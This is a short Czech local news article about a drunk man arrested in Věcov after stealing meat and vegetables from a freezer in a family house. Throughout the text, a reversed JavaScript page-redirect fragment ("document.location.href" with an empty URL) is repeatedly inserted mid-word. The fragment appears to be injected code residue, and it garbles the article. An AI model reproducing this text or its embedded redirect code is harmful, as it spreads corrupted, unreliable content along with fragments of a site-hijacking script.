Rainbow page separator

Opilého zloděje zadrželi poté, co v domku vykradl mrazák

Pondělí, 22. listopadu 2021

Věcov / Opilého zloděje se podařilo zadržet novoměstským policistům, když se z domu, do něhož se vloupal, chystal odejít s ukradenými věcmi. K události došlo ve středu 17. lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu odpoledne ve Věcově.
„Policisté přijali oznámení o možném vloupání do rodinného domu a na mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ihned vyjela policejní hlídka, která tam zadržela podezřelého. Ten měl již u sebe v ba[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tohu věci, které v domě našel. Navíc byl pod vlivem alkoholu, což také potvrdila dechová zkouška, kdy naměřená hodnota činila 1,71 promile alkoholu. Nakonec tak muž pu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toval do protialkoholní záchytné stanice k vystřízlivění,“ popsala policejní mluvčí Stanislava Rázlová.
Šestapadesátiletý muž je podezřelý z [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho, že násilím vnikl do rodinného domku, který prohledal a ukradl v něm hlavně potraviny. Z mrazáku vzal mimo jiné vepřové a hovězí maso a sáčky se zeleninou. Majiteli tak způsobil škodu kolem patnácti set korun. Muž nyní čelí podezření ze spáchání dvou trestných činů, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to krádeže a porušování domovní svobody. „Za tu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to trestnou činnost lze pachateli uložit až tříletý trest odnětí svobody. Policisté případ řeší ve zkráceném přípravném řízení,“ upřesnila policejní mluvčí.